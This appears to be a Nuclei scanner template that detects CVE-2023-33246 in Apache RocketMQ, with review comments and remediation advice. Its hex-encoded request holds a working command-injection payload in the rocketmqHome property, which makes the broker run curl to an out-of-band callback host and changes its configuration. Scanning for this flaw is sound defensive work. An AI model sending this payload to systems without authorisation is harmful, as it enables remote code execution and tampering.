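# Nuclei network template: checks an Apache RocketMQ broker for CVE-2023-33246
# (remote code execution, RocketMQ versions <= 5.1.0).
#
# NOTE(review): the probe is state-changing. The frame in part_a is a remoting
# request (header "code":25) whose body sets the broker properties
# filterServerNums and rocketmqHome. After a positive result, inspect the
# broker configuration and restore the original values; presumably the change
# stays in place on the broker after the scan - confirm on the deployment.
#
# Remediation for a confirmed finding: move the broker to a release newer than
# 5.1.0 and keep the broker port unreachable from untrusted networks.
id: CVE-2023-33246

info:
  name: RocketMQ versions <= 5.1.0 Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  reference: https://github.com/I5N0rth/CVE-2023-33246
  tags: cve,cve2023,rocketmq,rce

variables:
  # Pre-encoded start of the request: two 4-byte length fields, the JSON
  # remoting header, and the beginning of the property body.
  part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
  # Terminator appended after the callback URL: ";" followed by a newline.
  part_b: '{{ hex_decode("3b0a") }}'

tcp:
  - inputs:
      # part_a + out-of-band callback URL + filler + part_b.
      # NOTE(review): the run of "/" is presumably padding so the body keeps
      # the size announced by the length field fixed in part_a - confirm.
      - data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}'
        # Read up to 1024 bytes of the broker's answer after sending.
        read: 1024
    host:
      - "{{Hostname}}"
    # Size of the final read performed once all inputs have been sent.
    read-size: 4
    # Require both matchers. With this key commented out nuclei falls back to
    # OR, so the header-field matcher alone could report any endpoint that
    # answers with a RocketMQ remoting header as a critical RCE finding,
    # without evidence that the callback was triggered.
    matchers-condition: and
    matchers:
      # Out-of-band evidence: the callback host saw a DNS or HTTP interaction.
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
      # The peer replied with a RocketMQ remoting header. `raw` includes the
      # bytes consumed by `read: 1024` above; the default part only holds the
      # final read, which is limited to 4 bytes here.
      - type: word
        part: raw
        words:
          - "serializeTypeCurrentRPC"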